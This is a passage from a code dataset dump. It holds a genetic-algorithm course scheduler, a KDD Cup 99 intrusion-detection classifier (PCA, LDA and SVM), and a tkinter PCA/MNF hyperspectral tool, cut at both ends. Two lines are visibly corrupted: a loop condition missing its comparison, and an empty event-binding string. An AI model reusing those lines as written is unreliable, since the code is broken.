addedCourses:\n\t\t# \t\t\t\t\t\tcourse = Course(-1, -1)\n\t\t# else:\n\t\t# \tfor day in self.plan[:len(value)]:\n\t\t# \t\tfor time in day:\n\t\t# \t\t\tfor course in time:\n\t\t# \t\t\t\tif course.getCourseId() != -1:\n\t\t# \t\t\t\t\tif course.getCourseId() in addedCourses:\n\t\t# \t\t\t\t\t\tcourse = Course(-1, -1)\n\t\tseenCourses = []\n\t\tfor day in range(len(self.plan)):\n\t\t\tfor time in range(len(self.plan[day])):\n\t\t\t\tfor course in range(len(self.plan[day][time])):\n\t\t\t\t\tif self.plan[day][time][course].getCourseId() != -1:\n\t\t\t\t\t\tif self.plan[day][time][course].getCourseId() in seenCourses:\n\t\t\t\t\t\t\tself.plan[day][time][course] = Course(-1, -1)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tseenCourses.append(self.plan[day][time][course].getCourseId())\n\n\n\n\tdef changedDateAndTime(self, value):\n\t\tchangedPart = int(random.random()*100)%2\n\t\tif changedPart==0:\n\t\t\tsize = len(value)\n\t\t\tself.plan[0:size] = copy.deepcopy(value) \n\t\telse:\n\t\t\tsize = len(value)\n\t\t\tself.plan[len(self.plan)-size:] = copy.deepcopy(value)\n\t\t#temp = self.plan[day][time]\n\t\t#self.plan[day][time] = value \n\t\tself.FixDuplicate()\n\n\tdef mutate(self):\n\t\tfor _ in range(self.days*self.timeSlots):\n\t\t\twhile True:\t\n\t\t\t\tdayRand = int(random.random()*100)%self.days\n\t\t\t\ttimeRand = int(random.random()*100)%self.timeSlots\n\t\t\t\tif len(self.plan[dayRand][timeRand])>0:\n\t\t\t\t\tcourseRand = int(random.random()*100)%(len(self.plan[dayRand][timeRand]))\n\t\t\t\t\tbreak\n\t\t\tthisCourse = self.plan[dayRand][timeRand][courseRand]\n\t\t\tdel self.plan[dayRand][timeRand][courseRand]\n\t\t\tself.courses.append(thisCourse)\n\t\t\tself.putInRandomPossiblePlace(0)\n\n\tdef beforeDay(self, midDay):\n\t\treturn self.plan[0:midDay]\n\n\n\tdef afterDay(self, 
midDay):\n\t\treturn self.plan[midDay:]\n\n\nclass AllSchedules:\n\tdef __init__(self, count, days, timeSlots, courses=[], happiness=[], sadness=[]):\n\t\tself.happiness = happiness\n\t\tself.sadness = sadness\n\t\tself.count = count\n\t\tself.schedules = []\n\t\tself.days = days\n\t\tself.timeSlots = timeSlots\n\t\tself.courses = courses\n\t\tself.expectedVal = 0\n\t\tself.calcExpectedVal()\n\n\tdef createSchedules(self):\n\t\tnow = time.time()\t\n\t\tfor i in range(self.count):\n\t\t\t#print(\"Plan: \"+str(i))\n\t\t\tsch = Schedule(self.days, self.timeSlots, self.courses)\n\t\t\tself.schedules.append(sch)\n\t\tlater = time.time()\n\t\tdifference = int(later - now)\n\t\tprint(\"Population Creation: \"+str(difference)+\" Seconds\")\n\n\n\tdef Calcfitness(self, plan):\n\t\treturn plan.fitness(self.happiness, self.sadness)\n\n\n\tdef swapSchedules(self, plan1index, plan2index):\n\t\ttemp = self.schedules[plan1index]\n\t\tself.schedules[plan1index] = self.schedules[plan2index]\n\t\tself.schedules[plan2index] = temp\n\n\n\tdef sortSchedulesList(self):\t\t\n\t\tfor plan1index in range(len(self.schedules)-1):\n\t\t\tfor plan2index in range(0, plan1index):\n\t\t\t\tif self.Calcfitness(self.schedules[plan2index+1]) > self.Calcfitness(self.schedules[plan2index]):\n\t\t\t\t\tself.swapSchedules(plan2index+1, plan2index)\n\n\t\t# for plan in self.schedules:\n\t\t# \tprint(self.Calcfitness(plan))\n\n\tdef createNewPlan(self, plan, changedValue):\n\t\tthisPlan = plan[:]\n\t\tnewPlan = Schedule(self.days, self.timeSlots, [])\n\t\tnewPlan.setPlan(thisPlan)\n\t\tnewPlan.changedDateAndTime(changedValue)\n\t\tself.schedules.append(newPlan)\n\n\tdef crossOver(self):\n\t\t# print(\"crossover\")\n\t\t#print(\"here\")\n\t\texpert = self.schedules[0:20]\n\t\tfor plan1 in expert:\n\t\t\tif int(random.random()*100)%5 == 1 and len(self.schedules)>4:\n\t\t\t\tplan2index = int(random.random()*100)%4\n\t\t\t\t#print(plan2index)\n\t\t\telse:\n\t\t\t\tplan2index = int(random.random()*100)%(len(self.schedules))\n\t\t\t\t#print(plan2index)\n\n\t\t\tmidDay = int(self.days/2)\n\n\t\t\tdayAndTime1 = plan1.beforeDay(midDay)[:]\n\t\t\tdayAndTime2 = self.schedules[plan2index].afterDay(midDay)[:]\n\t\t\tself.createNewPlan(plan1.getPlan(), dayAndTime2)\n\t\t\tself.createNewPlan(self.schedules[plan2index].getPlan(), dayAndTime1)\n\n\t\t\t# print(self.Calcfitness(self.schedules[0]))\n\n\n\tdef createNewPlanWithMutation(self, plan):\n\t\tnewPlan = Schedule(self.days, self.timeSlots, [])\n\t\tnewPlan.setPlan(plan)\n\t\tnewPlan.mutate()\n\t\tself.schedules.append(newPlan)\n\n\tdef mutation(self):\n\t\tprint('mutating')\n\t\tplanindex = int(random.random()*100)%(int(len(self.schedules)/2))\n\t\tif planindex+20MAX_NUMBER_OF_SCHEDULES:\n\t\t\t#print(self.Calcfitness(self.schedules[-1]))\n\t\t\tdel self.schedules[-1]\n\n\tdef sortCourses(self, temp):\n\t\tfor i in range(len(temp)-1, 0, -1):\n\t\t\tfor j in range(i):\n\t\t\t\tif self.happiness[temp[j].getCourseId()-1] > self.happiness[temp[j+1].getCourseId()-1]:\n\t\t\t\t\ttempTemp = temp[j]\n\t\t\t\t\ttemp[j] = temp[j+1]\n\t\t\t\t\ttemp[j+1] = tempTemp\n\n\n\tdef calcExpectedVal(self):\n\t\ttemp = self.courses[:]\n\t\tself.sortCourses(temp)\n\t\tfor i in range(int(self.days*self.timeSlots)):\n\t\t\tself.expectedVal += int(self.happiness[temp[i].getCourseId()-1])\n\n\tdef reachBestSchedule(self):\n\t\tprevMax = 0\n\t\tnumberOfGenerations = NUMBER_OF_GENERATIONS\n\t\tself.sortSchedulesList()\n\t\twhile True:\n\t\t\tnow = time.time()\n\t\t\tnumberOfGenerations -= 1\n\t\t\tnewMax = 
self.Calcfitness(self.schedules[0])\n\t\t\tprint(\"Max: \"+str(newMax))\n\t\t\t#if newMax>self.expectedVal or numberOfGenerations==0 or abs(newMax-prevMax)<50:\n\t\t\tif numberOfGenerations==0 or abs(newMax-prevMax)<50:\n\t\t\t# if numberOfGenerations==0:\n\t\t\t\tbreak\n\t\t\tprevMax = newMax\n\t\t\tself.crossOver()\n\t\t\tself.sortSchedulesList()\n\t\t\tif int(random.random()*100)%2 == 1:\n\t\t\t\tself.mutation()\n\t\t\tself.trimPopulation()\n\t\t\tlater = time.time()\n\t\t\tdifference = int(later - now)\n\t\t\tprint(\"Generation Creation Time: \"+str(difference)+\" Seconds\")\n\t\t\t\n\t\tself.schedules[0].printOutput(newMax)\n\n\n\tdef printInfo(self):\n\t\tprint(\"All Plans:\")\n\t\tfor i in range(len(self.schedules)):\n\t\t\tself.schedules[i].printPlan()\n\nclass Professor:\n\tdef __init__(self, prof_id, number_of_courses, my_courses=[]):\n\t\tself.prof_id = prof_id\n\t\tself.my_courses = my_courses\n\t\tself.number_of_courses = number_of_courses\n\n\tdef printInfo(self):\n\t\tprint(\"prof_id: \"+ str(self.prof_id))\n\n\n\nclass University:\n\tdef __init__(self):\n\t\t#list of course and prof\n\t\tself.profs = []\n\t\tself.courses_by_profs = []\n\t\tself.all_courses = []\n\t\tself.sadness = []\n\t\tself.valueofHappiness = []\n\t\t# c\n\t\tself.NUMBER_OF_COURSES = 0 \n\t\t# p \n\t\tself.NUMBER_OF_PROFS = 0\n\t\t# t\n\t\tself.TIME_SLOT = 0\n\t\t# d\n\t\tself.DAY_SLOT = 0\n\n\t\tself.schedules = \"\"\n\t\t\n\n\tdef printInfo(self):\n\t\tprint(\"Professors: {}\".format(self.profs))\n\t\tprint(\"Courses: {}\".format(self.courses_by_profs))\n\t\tprint(\"Sadness: {}\".format(self.sadness))\n\n\n\tdef readInput(self):\t\n\t\tself.DAY_SLOT, self.TIME_SLOT = map(int, input().split())\n\t\tself.NUMBER_OF_COURSES = int(input())\n\t\tself.valueofHappiness = input().split()\n\t\tself.NUMBER_OF_PROFS = int(input())\n\t\tfor numP in range(self.NUMBER_OF_PROFS):\n\t\t\tprofCourses = input().split()\n\t\t\tprofCourses = convertListToInt(profCourses)\n\t\t\tnumOFCourses = profCourses[0]\n\t\t\tdel profCourses[0]\n\t\t\tself.profs.append(Professor(numP, numOFCourses,profCourses))\n\t\t\tself.courses_by_profs.append(profCourses)\n\t\tfor i in range(self.NUMBER_OF_COURSES):\n\t\t\tsadnessLine = input().split()\n\t\t\tsadnessLine = convertListToInt(sadnessLine)\n\t\t\tself.sadness.append(sadnessLine)\n\n\t\tself.makeAllCourses()\n\n\tdef makeAllCourses(self):\n\t\tprofID = -1;\t\t\n\t\tfor profCourse in self.courses_by_profs:\n\t\t\tprofID +=1\n\t\t\tif len(profCourse)>1:\n\t\t\t\tfor course in profCourse:\n\t\t\t\t\tself.all_courses.append(Course(course, profID))\n\t\t\telif len(profCourse)==1:\n\t\t\t\tself.all_courses.append(Course(profCourse[0], profID))\n\t\t\telse:\n\t\t\t\tcontinue\n\n\tdef createPopulation(self):\n\t\tself.schedules = AllSchedules(NUMBER_OF_SCHEDULES , self.DAY_SLOT, self.TIME_SLOT, self.all_courses, self.valueofHappiness, self.sadness)\n\t\tself.schedules.createSchedules()\n\t\tself.schedules.reachBestSchedule()\n\n\n\ndef test():\n\tprofCourses = input().split()\n\tprint (convertListToInt(profCourses))\n\ndef test2():\n\tprint(\"1{}\".format([1, 2, 3]))\n\n\ndef sortFile():\n\tcontent = []\n\tfile = open(OUTPUT_FILE_NAME, 'r')\n\tfor line in file:\n\t\tif line != '\\n':\n\t\t\tcontent.append(line.replace('\\n', ''))\n\tfile.close()\n\n\tfor passnum in range(len(content)-1,0,-1):\n\t\tfor i in range(1, passnum):\n\t\t\tline1Split = content[i].split()\n\t\t\tline2Split = content[i+1].split()\n\t\t\t# print(\"XX\")\n\t\t\t# print(line1Split)\n\t\t\t# print(line2Split)\n\t\t\tif 
int(line1Split[0])==int(line2Split[0]) and int(line1Split[1])==int(line2Split[1]) and int(line1Split[2])>int(line2Split[2]):\n\t\t\t\ttemp = copy.deepcopy(content[i])\n\t\t\t\tcontent[i] = copy.deepcopy(content[i+1])\n\t\t\t\tcontent[i+1] = copy.deepcopy(temp)\n\t\t\t\t# print(\"After Swap\")\n\t\t\t\t# print(str(line1Split[2])+\" > \"+str(line2Split[2]))\n\t\t\t\t# print(content[i])\n\t\t\t\t# print(content[i+1])\n\n\n\tfile = open(OUTPUT_FILE_NAME, 'w')\n\tfor line in content:\n\t\tfile.write(line+'\\n')\n\tfile.close()\n\n\ndef mainFunc():\n\tuni = University()\n\tuni.readInput()\n\tuni.createPopulation()\n\tsortFile()\n\nif __name__ == '__main__':\n\tnow = time.time()\n\tmainFunc()\n\tlater = time.time()\n\tdifference = int(later - now)\n\tprint(\"Total Time: \"+str(difference)+\" Seconds\")\n\n\n\n","sub_path":"Upload Files/changeCrossOver.py","file_name":"changeCrossOver.py","file_ext":"py","file_size_in_byte":14112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"575797266","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 13 09:55:52 2021\r\n\r\n@author: rbarb\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue May 11 00:27:04 2021\r\n\r\n@author: rbarb\r\n\"\"\"\r\n# ANN\r\n# Author: Robert Barbulescu\r\n\r\n# importing necessary packages \r\n\r\nfrom sklearn.decomposition import PCA\r\nimport pandas as pd\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom time import time\r\nimport numpy as np\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import confusion_matrix, accuracy_score, classification_report, f1_score, roc_curve, cohen_kappa_score\r\nimport sklearn.metrics as metrics\r\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA\r\n\r\n# used for better plots\r\nplt.style.use('ggplot')\r\n\r\n# The features existing on the dataset \r\n# The features names were obtained from: http://kdd.ics.uci.edu/databases/kddcup99/kddcup.names\r\nfeatures = [\"duration\",\"protocol_type\",\"service\",\"flag\",\"src_bytes\",\r\n \"dst_bytes\",\"land\",\"wrong_fragment\",\"urgent\",\"hot\",\"num_failed_logins\",\r\n \"logged_in\",\"num_compromised\",\"root_shell\",\"su_attempted\",\"num_root\",\r\n \"num_file_creations\",\"num_shells\",\"num_access_files\",\"num_outbound_cmds\",\r\n \"is_host_login\",\"is_guest_login\",\"count\",\"srv_count\",\"serror_rate\",\r\n \"srv_serror_rate\",\"rerror_rate\",\"srv_rerror_rate\",\"same_srv_rate\",\r\n \"diff_srv_rate\",\"srv_diff_host_rate\",\"dst_host_count\",\"dst_host_srv_count\",\r\n \"dst_host_same_srv_rate\",\"dst_host_diff_srv_rate\",\"dst_host_same_src_port_rate\",\r\n \"dst_host_srv_diff_host_rate\",\"dst_host_serror_rate\",\"dst_host_srv_serror_rate\",\r\n \"dst_host_rerror_rate\",\"dst_host_srv_rerror_rate\",\"label\"]\r\n\r\n# Mounting and reaidng the csv file with the dataset\r\n# Also available using sklearn packgae: https://scikit-learn.org/stable/modules/generated/sklearn.datasets.fetch_kddcup99.html\r\ndataset = pd.read_csv(r\"C:\\Users\\rbarb\\Desktop\\ANN\\kddcup.data_10_percent_corrected\", names = features, header=None)\r\n\r\n# The number of samples and dimensions\r\nprint('Data Points:',dataset.shape[0])\r\nprint('Features:',dataset.shape[1])\r\nprint(\"Initial data shape is:\", 
dataset.shape)\r\nprint(\"=======================================================================\")\r\n\r\n# remove any existing duplicates\r\ndataset.drop_duplicates(subset=None, keep='first', inplace=True)\r\nprint(\"Duplicates successfully dropped.\")\r\nprint(\"Dataset shape is:\", dataset.shape)\r\nprint(\"=======================================================================\")\r\n\r\n# Looking for any NULL values\r\nprint('Null values existing: ',len(dataset[dataset.isnull().any(axis=1)]))\r\nprint(\"=======================================================================\")\r\n\r\n# Change Multi-class to binary-class\r\ndataset['label'] = dataset['label'].replace(['back.', 'buffer_overflow.', 'ftp_write.', 'guess_passwd.', 'imap.', 'ipsweep.', 'land.', 'loadmodule.', 'multihop.', 'neptune.', 'nmap.', 'perl.', 'phf.', 'pod.', 'portsweep.', 'rootkit.', 'satan.', 'smurf.', 'spy.', 'teardrop.', 'warezclient.', 'warezmaster.'], 'attack')\r\n\r\nx = dataset.iloc[:, :-1].values\r\ny = dataset.iloc[:, 41].values\r\n\r\n# Encoding categorical data of 3 fields: protocol_type, service, and flag\r\nencoder = LabelEncoder()\r\nx[:, 1] = encoder.fit_transform(x[:, 1])\r\nx[:, 2] = encoder.fit_transform(x[:, 2])\r\nx[:, 3] = encoder.fit_transform(x[:, 3])\r\n\r\ny = encoder.fit_transform(y)\r\n\r\n# Display newly structured classes\r\nprint(dataset.groupby('label')['label'].count())\r\n\r\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size = 0.3, random_state = 0)\r\nprint(\"Size of training Data is % d and Testing Data is % d\" %(\r\n        y_train.shape[0], y_test.shape[0]))\r\nprint(\"=======================================================================\")\r\n\r\n# Feature Scaling\r\nscaler = StandardScaler()\r\nx_train = scaler.fit_transform(x_train)\r\nx_test = scaler.transform(x_test)\r\n\r\n# Plotting the variance\r\npca = PCA().fit(x_train)\r\nplt.plot(np.cumsum(pca.explained_variance_ratio_))\r\nplt.xlabel('Number of Features')\r\nplt.ylabel('Cumulative Explained Variance')\r\n\r\nplt.show()\r\n\r\npca = PCA(copy=True, iterated_power='auto', n_components=30, random_state=None,\r\n          svd_solver='auto', tol=0.0, whiten=False).fit(x_train)\r\n\r\nlda = LDA().fit(pca.transform(x_train), y_train)\r\n\r\nx_train_lda = lda.transform(pca.transform(x_train))\r\nx_test_lda = lda.transform(pca.transform(x_test))\r\n\r\nt0 = time()\r\n\r\nprint(\"Sample Data point after applying PCA and LDA\\n\", x_train_lda[0])\r\nprint(\"=======================================================================\")\r\nprint(\"Dimensions of training set = % s and Test Set = % s\"%(\r\n    x_train.shape, x_test.shape)) \r\nprint(\"Fitting the classifier to the training set\")\r\nprint(\"=======================================================================\")\r\n\r\nclf = SVC(kernel='linear',class_weight=\"balanced\", gamma = \"auto\")\r\nclf = clf.fit(x_train_lda, y_train)\r\nprint(\"Done in %0.3fs\" % (time() - t0))\r\n\r\ny_pred = clf.predict(x_test_lda)\r\n\r\nprint(\"=======================================================================\")\r\nprint(\"Accuracy score:{:.2f}%\".format(metrics.accuracy_score(y_test, y_pred)*100))\r\nprint(\"=======================================================================\")\r\nprint(\"Number of mislabeled points out of a total %d points is %d\" % (x_test.shape[0], (y_test != y_pred).sum()))\r\nprint(\"=======================================================================\")\r\n\r\ntarget_names = ['Attack', 'Normal']\r\n# print classification 
results\r\nprint(classification_report(y_test, y_pred, target_names=target_names))\r\n# print confusion matrix\r\nprint(\"=======================================================================\")\r\nprint(\"Confusion Matrix is:\")\r\nprint(confusion_matrix(y_test, y_pred))\r\nprint(\"=======================================================================\")","sub_path":"src/binary/LDA-SVM_binary.py","file_name":"LDA-SVM_binary.py","file_ext":"py","file_size_in_byte":5965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"148202681","text":"import tkinter as tk\nfrom tkinter import*\nfrom spectral import*\nimport spectral.io.envi as envi\nfrom tkinter.filedialog import askopenfilename \ndef s5():\n t.destroy()\n t2=Toplevel(root)\n t2.title(\"PCA\")\n t2.resizable(width=False,height=False)\n l=txtVar.get()\n f=txtVar4.get()\n j=txtVar11.get()\n g=open(j+\".txt\",'w')\n g.write(\"Mean Value:\\n\")\n count=1\n for k1 in pc.mean:\n g.write(\"Band\")\n g.write(str(count))\n g.write(\"\\t\")\n g.write(str(k1))\n g.write(\"\\n\")\n count=count+1\n g.write(\"\\n\") \n g.write(\"EigenValues:\\n\")\n count=1\n for k2 in pc.eigenvalues:\n g.write(\"Band\")\n g.write(str(count))\n g.write(\"\\t\")\n g.write(str(k2))\n g.write(\"\\n\")\n count=count+1\n g.write(\"\\n\") \n g.write(\"Covariance:\\n\")\n count=1\n for k3 in pc.cov:\n g.write(\"Band\")\n g.write(str(count))\n g.write(\"\\t\")\n g.write(\"\\t\")\n g.write(str(k3))\n g.write(\"\\n\")\n g.write(\"\\n\")\n count=count+1\n g.close() \n d=int(l)\n pc_0999 = pc.reduce(num=d)\n img_pc = pc_0999.transform(mylib)\n envi.save_image(f+\".hdr\",img_pc)\n widget = Label(t2, text='Successfully Completed') \n widget.pack()\n widget.mainloop()\ndef s1():\n t3.destroy()\n t2=Toplevel(root)\n t2.title(\"MNF\")\n t2.resizable(width=False,height=False)\n d=txtVar2.get()\n r=txtVar3.get()\n f1=txtVar5.get()\n j=txtVar9.get()\n g=open(j+\".txt\",'w')\n g.write(\"Mean Value:\\n\")\n count=1\n for k1 in pc.mean:\n g.write(\"Band\")\n g.write(str(count))\n g.write(\"\\t\")\n g.write(str(k1))\n g.write(\"\\n\")\n count=count+1\n g.write(\"\\n\") \n g.write(\"EigenValues:\\n\")\n count=1\n for k2 in pc.eigenvalues:\n g.write(\"Band\")\n g.write(str(count))\n g.write(\"\\t\")\n g.write(str(k2))\n g.write(\"\\n\")\n count=count+1\n g.write(\"\\n\") \n g.write(\"Covariance:\\n\")\n count=1\n for k3 in pc.cov:\n g.write(\"Band\")\n g.write(str(count))\n g.write(\"\\t\")\n g.write(\"\\t\")\n g.write(str(k3))\n g.write(\"\\n\")\n g.write(\"\\n\")\n count=count+1\n g.close()\n s=int(d)\n f=float(r)\n signal = calc_stats(mylib)\n noise = noise_from_diffs(mylib[117: 137, 85: 122, :])\n pc1 = mnf(signal, noise)\n denoised = pc1.denoise(mylib,snr=f)\n pc_0999 = pc1.reduce(mylib,num=s)\n img_pc = pc_0999.transform(mylib)\n envi.save_image(f1+\".hdr\",img_pc)\n j=txtVar10.get()\n g=open(j+\".txt\",'w')\n h=txtVar3.get()\n g.write(\"SNR Ratio: \")\n g.write(h)\n g.write(\"\\n\")\n g.write(\"Mean Value:\\n\")\n count=1\n for k1 in noise.mean:\n g.write(\"Band\")\n g.write(str(count))\n g.write(\"\\t\")\n g.write(str(k1))\n g.write(\"\\n\")\n g.write(\"\\n\")\n count=count+1\n g.write(\"\\n\") \n g.write(\"Covariance:\\n\")\n g.write(\"\\n\")\n count=1\n for k3 in noise.cov:\n g.write(\"Band\")\n g.write(str(count))\n g.write(\"\\t\")\n g.write(\"\\t\")\n g.write(str(k3))\n g.write(\"\\n\")\n g.write(\"\\n\")\n count=count+1\n g.close()\n widget = Label(t2, text='Successfully Completed') \n widget.pack()\n widget.mainloop()\ndef 
OnDouble(t): \n location = lb.curselection()[0]\n value=lb.get(location)\n s=sf[value]\n l=gt.read_band(s)\n cview = imshow(classes=l) \ndef pee(t):\n location=lb1.curselection()[0]\n value=lb1.get(location)\n s=sf1[value]\n txtVar2.set(s)\ndef pee1(t):\n location=lb2.curselection()[0]\n value=lb2.get(location)\n s=sf2[value]\n txtVar.set(s)\ndef yes(nbands):\n global t\n t=Toplevel(root)\n t.geometry(\"500x370\")\n t.resizable(width=False, height=False)\n t.title(\"PCA\")\n v = StringVar()\n Label(t, textvariable=v,font = ('Times New Roman', 12, 'bold')).place(x=10,y=0)\n v.set(\"Total number of bands in image: \")\n v6 = StringVar()\n Label(t, textvariable=v6,font = ('Times New Roman', 14, 'bold'),fg='red').place(x=235,y=0)\n d=str(nbands)\n v6.set(d)\n v3=StringVar()\n k=tk.Label(t, textvariable=v3,font = ('Times New Roman',10))\n k.place(x=10,y=40)\n v3.set(\"Enter the output file name( Without Extension ):\")\n global txtVar4\n txtVar4 = StringVar(None)\n usrIn = Entry(t, textvariable = txtVar4, width =20)\n usrIn.place(x=300,y=40)\n v1=StringVar()\n Label(t, textvariable=v1,font = ('Times New Roman',10)).place(x=10,y=80)\n v1.set(\"Enter the no. of components desired:**\")\n v7 = StringVar()\n Label(t, textvariable=v7,font = ('Times New Roman', 10)).place(x=85,y=100)\n v7.set(\"(<=No. of input band )\")\n global txtVar\n txtVar = StringVar(None)\n usrIn = Entry(t, textvariable = txtVar, width =20)\n usrIn.place(x=300,y=80)\n global pc\n pc = principal_components(mylib)\n v7=StringVar()\n Label(t, textvariable=v7,font = ('Times New Roman',10)).place(x=10,y=140)\n v7.set(\"Select the no. of components based on eigen values:\")\n global lb2\n lb2=Listbox(t, width=13,height=7)\n scrollbar =tk.Scrollbar(t,command=lb2.yview,orient=\"vertical\")\n scrollbar.place(x=380,y=140,height=117)\n global sf2\n sf2=dict()\n count=1\n for l in pc.eigenvalues:\n g = float(\"{0:.10f}\".format(l))\n s=str(g)\n sf2[s]=count\n lb2.insert(END,s)\n count=count+1\n lb2.place(x=300,y=140) \n lb2.configure(yscrollcommand=scrollbar.set)\n lb2.bind(\"<>\",pee1)\n v8 = StringVar()\n Label(t, textvariable=v8,font = ('Times New Roman', 10)).place(x=10,y=290)\n v8.set(\"Enter the output statistics file name:\")\n global txtVar11\n txtVar11 = StringVar(None)\n usrIn = Entry(t, textvariable = txtVar11, width =20)\n usrIn.place(x=300,y=290)\n button = tk.Button(t, text=\"Cancel\",command=t.destroy)\n button.place(x=350,y=345)\n button = tk.Button(t, text=\"OK\",command=s5)\n button.place(x=300,y=345)\ndef yes2(nbands):\n global t3\n t3=Toplevel(root)\n t3.geometry(\"500x450\")\n t3.resizable(width=False, height=False)\n t3.title(\"MNF\")\n v = StringVar()\n Label(t3, textvariable=v,font = ('Times New Roman', 12, 'bold')).place(x=10,y=0)\n v.set(\"Total number of bands in image: \")\n v6 = StringVar()\n Label(t3, textvariable=v6,font = ('Times New Roman', 14, 'bold'),fg='red').place(x=235,y=0)\n d=str(nbands)\n v6.set(d)\n v3=StringVar()\n k=tk.Label(t3, textvariable=v3,font = ('Times New Roman',10))\n k.place(x=10,y=40)\n v3.set(\"Enter the output file name( Without Extension ):\")\n global txtVar5\n txtVar5 = StringVar(None)\n usrIn = Entry(t3, textvariable = txtVar5, width =20)\n usrIn.place(x=300,y=40)\n v1=StringVar()\n Label(t3, textvariable=v1,font = ('Times New Roman',10)).place(x=10,y=80)\n v1.set(\"Enter the no. of components desired:**\")\n v7 = StringVar()\n Label(t3, textvariable=v7,font = ('Times New Roman', 10)).place(x=85,y=100)\n v7.set(\"(<=No. 
of input band )\")\n global txtVar2\n txtVar2 = StringVar(None)\n usrIn = Entry(t3, textvariable = txtVar2, width =20)\n usrIn.place(x=300,y=80)\n v2=StringVar()\n Label(t3, textvariable=v2,font = ('Times New Roman',10)).place(x=10,y=140)\n v2.set(\"Enter SNR ratio: \")\n global txtVar3\n txtVar3 = StringVar(None)\n usrIn = Entry(t3, textvariable = txtVar3, width =20)\n usrIn.place(x=300,y=140)\n pc = principal_components(mylib)\n v7=StringVar()\n Label(t3, textvariable=v7,font = ('Times New Roman',10)).place(x=10,y=180)\n v7.set(\"Select the no. of components based on eigen values:\")\n global lb1\n lb1=Listbox(t3, width=13,height=7)\n scrollbar =tk.Scrollbar(t3,command=lb1.yview,orient=\"vertical\")\n scrollbar.place(x=380,y=180,height=117)\n global sf1\n sf1=dict()\n count=1\n for l in pc.eigenvalues:\n g = float(\"{0:.10f}\".format(l))\n s=str(g)\n sf1[s]=count\n lb1.insert(END,s)\n count=count+1\n lb1.place(x=300,y=180) \n lb1.configure(yscrollcommand=scrollbar.set)\n lb1.bind(\"<<ListboxSelect>>\",pee)\n v8 = StringVar()\n Label(t3, textvariable=v8,font = ('Times New Roman', 10)).place(x=10,y=330)\n v8.set(\"Enter the output statistics file name:\")\n global txtVar9\n txtVar9 = StringVar(None)\n usrIn = Entry(t3, textvariable = txtVar9, width =20)\n usrIn.place(x=300,y=330)\n v9 = StringVar()\n Label(t3, textvariable=v9,font = ('Times New Roman', 10)).place(x=10,y=370)\n v9.set(\"Enter the noise output statistics file name of:\")\n global txtVar10\n txtVar10 = StringVar(None)\n usrIn = Entry(t3, textvariable = txtVar10, width =20)\n usrIn.place(x=300,y=370)\n button = tk.Button(t3, text=\"Cancel\",command=t3.destroy)\n button.place(x=350,y=415)\n button = tk.Button(t3, text=\"OK\",command=s1)\n button.place(x=300,y=415)\ndef donothing():\n filewin=Toplevel(root)\n button=Button(filewin,text=\"Do nothing button\")\n button.pack() \ndef pcatxt():\n t3=Toplevel(root)\n t3.title(\"Principal Component Analysis\")\n t3.geometry(\"600x210\")\n t3.resizable(width=False,height=False)\n v1=StringVar()\n Label(t3,textvariable=v1,font = ('Times New Roman',10)).pack()\n v1.set(\"The main linear technique for dimensionality reduction, principal component analysis, performs a\")\n v2=StringVar()\n Label(t3,textvariable=v2,font = ('Times New Roman',10)).pack()\n v2.set(\"linear mapping of the data to a lower-dimensional space in such a way that the variance of the data\")\n v3=StringVar()\n Label(t3,textvariable=v3,font = ('Times New Roman',10)).pack()\n v3.set(\"in the low-dimensional representation is maximized. In practice, the covariance (and sometimes the\")\n v4=StringVar()\n Label(t3,textvariable=v4,font = ('Times New Roman',10)).pack()\n v4.set(\"correlation) matrix of the data is constructed and the eigen vectors of this matrix are computed.\")\n v5=StringVar()\n Label(t3,textvariable=v5,font = ('Times New Roman',10)).pack()\n v5.set(\"The eigen vectors that correspond to the largest eigenvalues (the principal components) can now be\")\n v6=StringVar()\n Label(t3,textvariable=v6,font = ('Times New Roman',10)).pack()\n v6.set(\"used to reconstruct a large fraction of the variance of the original data. 
Moreover, the first few\")\n v7=StringVar()\n Label(t3,textvariable=v7,font = ('Times New Roman',10)).pack()\n v7.set(\"eigen vectors can often be interpreted in terms of the large-scale physical behavior of the system.\")\n v8=StringVar()\n Label(t3,textvariable=v8,font = ('Times New Roman',10)).pack()\n v8.set(\"The original space (with dimension of the number of points) has been reduced (with data loss, but\")\n v9=StringVar()\n Label(t3,textvariable=v9,font = ('Times New Roman',10)).pack()\n v9.set(\"hopefully retaining the most important variance) to the space spanned by a few eigenvectors.\")\ndef ddrtxt():\n t3=Toplevel(root)\n t3.title(\"What is data dimensionality reduction\")\n t3.geometry(\"600x170\")\n t3.resizable(width=False,height=False)\n v1=StringVar()\n Label(t3,textvariable=v1,font = ('Times New Roman',10)).pack()\n v1.set(\"Dimensionality reduction is all about transforming data into a low-dimensional space in which data\")\n v2=StringVar()\n Label(t3,textvariable=v2,font = ('Times New Roman',10)).pack()\n v2.set(\"preserves its euclidean structure but does not suffer from curse of dimensionality. For instance \")\n v3=StringVar()\n Label(t3,textvariable=v3,font = ('Times New Roman',10)).pack()\n v3.set(\"assume you extract some word features [x1,...,xn][x1,...,xn] from a data set where each document can\")\n v4=StringVar()\n Label(t3,textvariable=v4,font = ('Times New Roman',10)).pack()\n v4.set(\"be modeled as a point in n-dimensional space and n is too large (a toy example). In this case many\")\n v5=StringVar()\n Label(t3,textvariable=v5,font = ('Times New Roman',10)).pack()\n v5.set(\"algorithms do not work according to the distance distortion of high-dimensional space. Now you \")\n v6=StringVar()\n Label(t3,textvariable=v6,font = ('Times New Roman',10)).pack()\n v6.set(\"need to reduce dimensionality by either selecting most informative features or transforming them \")\n v7=StringVar()\n Label(t3,textvariable=v7,font = ('Times New Roman',10)).pack()\n v7.set(\"into a low-dimensional manifold using dimensionality reduction methods e.g. PCA, MNF, etc.\") \ndef mnftxt():\n t3=Toplevel(root)\n t3.title(\"Minimum Noise 